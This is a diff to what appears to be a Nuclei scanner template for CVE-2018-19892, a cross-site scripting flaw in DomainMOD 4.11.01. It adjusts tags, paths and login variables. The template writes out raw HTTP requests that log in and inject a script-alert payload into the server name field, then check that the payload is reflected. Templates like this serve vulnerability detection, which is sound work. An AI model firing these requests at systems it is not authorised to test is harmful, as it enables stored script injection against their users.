diff --git a/cves/2018/CVE-2018-19892.yaml b/cves/2018/CVE-2018-19892.yaml index 6d25d97c39..0f81de0cfa 100644 --- a/cves/2018/CVE-2018-19892.yaml +++ b/cves/2018/CVE-2018-19892.yaml @@ -1,59 +1,46 @@ id: CVE-2018-19892 info: - name: DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting + name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters. reference: - https://www.exploit-db.com/exploits/45959 - metadata: verified: true - tags: wbcecms,xss + tags: cve,cve2018,domainmod,xss requests: - raw: - - # - | - # GET /domain/ HTTP/1.1 - # Host: {{Hostname}} - # Content-Type: application/x-www-form-urlencoded - - | - POST /domain/ HTTP/1.1 + POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - new_username=admin&new_password=admin123 + new_username={{username}}&new_password={{password}} - | - POST /domain//admin/dw/add-server.php HTTP/1.1 - Host: {{Hostname}} + POST /admin/dw/add-server.php HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Origin: https://{{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= - | - GET /domain//admin/dw/servers.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + GET /admin/dw/servers.php HTTP/1.1 + Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and + cookie-reuse: true redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word part: body words: - - "" + - '">' - type: word part: header